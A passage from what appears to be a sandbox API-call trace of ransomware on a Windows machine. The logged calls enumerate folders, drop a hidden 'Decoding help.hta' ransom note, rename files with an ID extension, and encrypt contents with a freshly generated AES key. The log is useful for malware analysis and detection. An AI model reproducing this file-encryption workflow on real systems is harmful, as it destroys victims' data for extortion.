(x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.249] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.249] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" [0058.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.249] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.249] lstrlenW (lpString="gadget.xml") returned 10 [0058.249] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.249] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.249] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" [0058.249] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" [0058.249] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.250] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.250] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.250] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.250] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.250] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.250] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.250] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js" [0058.250] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\js\\*.*" [0058.250] GlobalMemoryStatus (in: lpBuffer=0x28edfd10 | out: lpBuffer=0x28edfd10) [0058.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e2ec98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0058.251] CloseHandle (hObject=0x354) returned 1 [0058.251] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0058.251] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.251] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.251] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" [0058.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.251] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.html") returned -1 [0058.251] lstrlenW (lpString="settings.html") returned 13 [0058.252] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.252] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" [0058.252] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" [0058.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\settings.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.252] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2814, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0058.252] FindClose (in: hFindFile=0x5a58b0 | out: hFindFile=0x5a58b0) returned 1 Thread: id = 862 os_tid = 0xa94 [0054.695] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*", lpFindFileData=0x2901fd30 | out: lpFindFileData=0x2901fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671cf0 [0054.696] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.696] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x2901fd30 | out: lpFindFileData=0x2901fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.696] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.696] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.696] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x2901fd30 | out: lpFindFileData=0x2901fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="36USA68T", cAlternateFileName="")) returned 1 [0054.696] lstrcmpW (lpString1=".", lpString2="36USA68T") returned -1 [0054.696] lstrcmpW (lpString1="..", lpString2="36USA68T") returned -1 [0054.696] lstrcmpiW (lpString1="windows", lpString2="36USA68T") returned 1 [0054.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" [0054.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned 91 [0054.699] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\", lpString2="36USA68T" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T" [0054.699] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*" [0054.699] GlobalMemoryStatus (in: lpBuffer=0x2901fd10 | out: lpBuffer=0x2901fd10) [0054.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a870718, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0054.705] CloseHandle (hObject=0x808) returned 1 [0054.705] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x2901fd30 | out: lpFindFileData=0x2901fd30*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3O75JDME", cAlternateFileName="")) returned 1 [0054.705] lstrcmpW (lpString1=".", lpString2="3O75JDME") returned -1 [0054.705] lstrcmpW (lpString1="..", lpString2="3O75JDME") returned -1 [0054.705] lstrcmpiW (lpString1="windows", lpString2="3O75JDME") returned 1 [0054.708] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" [0054.708] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned 91 [0054.708] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\", lpString2="3O75JDME" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME" [0054.708] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*" [0054.708] GlobalMemoryStatus (in: lpBuffer=0x2901fd10 | out: lpBuffer=0x2901fd10) [0054.708] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a888780, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0054.712] CloseHandle (hObject=0x808) returned 1 [0054.712] FindNextFileW (in: hFindFile=0x671cf0, lpFindFileData=0x2901fd30 | out: lpFindFileData=0x2901fd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0054.712] lstrcpyW (in: lpString1=0x2a8a07e8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" [0054.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned 91 [0054.712] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\Decoding help.hta" [0054.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\decoding help.hta")) returned 0xffffffff [0054.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x84c [0056.140] WriteFile (in: hFile=0x84c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2901fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2901fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.238] CloseHandle (hObject=0x84c) returned 1 [0058.238] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.238] lstrcmpiW (lpString1="Decoding help.hta", lpString2="index.dat") returned -1 [0058.238] lstrlenW (lpString="index.dat") returned 9 [0058.238] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*" [0058.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*.*") returned 91 [0058.238] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\", lpString2="index.dat" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" [0058.238] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" [0058.238] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0058.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x84c [0058.239] CreateFileMappingA (hFile=0x84c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x844 [0058.239] CryptAcquireContextA (in: phProv=0x2901fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2901fcec*=0x3449578) returned 1 [0060.187] CryptGenKey (in: hProv=0x3449578, Algid=0x6610, dwFlags=0x1, phKey=0x2901fce8 | out: phKey=0x2901fce8*=0x5a5fb0) returned 1 [0060.187] CryptExportKey (in: hKey=0x5a5fb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2901fbe4, pdwDataLen=0x2901fce4 | out: pbData=0x2901fbe4*, pdwDataLen=0x2901fce4*=0x2c) returned 1 [0060.187] MapViewOfFile (hFileMappingObject=0x844, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8000) returned 0x40b0000 [0063.766] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2901fbe4*, pdwDataLen=0x2901fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2901fbe4*, pdwDataLen=0x2901fcf8*=0x100) returned 1 [0063.768] CryptEncrypt (in: hKey=0x5a5fb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x40b0000, pdwDataLen=0x2901fce4*=0x8000, dwBufLen=0x8000 | out: pbData=0x40b0000*, pdwDataLen=0x2901fce4*=0x8000) returned 1 [0063.788] UnmapViewOfFile (lpBaseAddress=0x40b0000) Thread: id = 863 os_tid = 0xaf4 [0054.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*", lpFindFileData=0x2915fd30 | out: lpFindFileData=0x2915fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671330 [0055.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.905] FindNextFileW (in: hFindFile=0x671330, lpFindFileData=0x2915fd30 | out: lpFindFileData=0x2915fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, 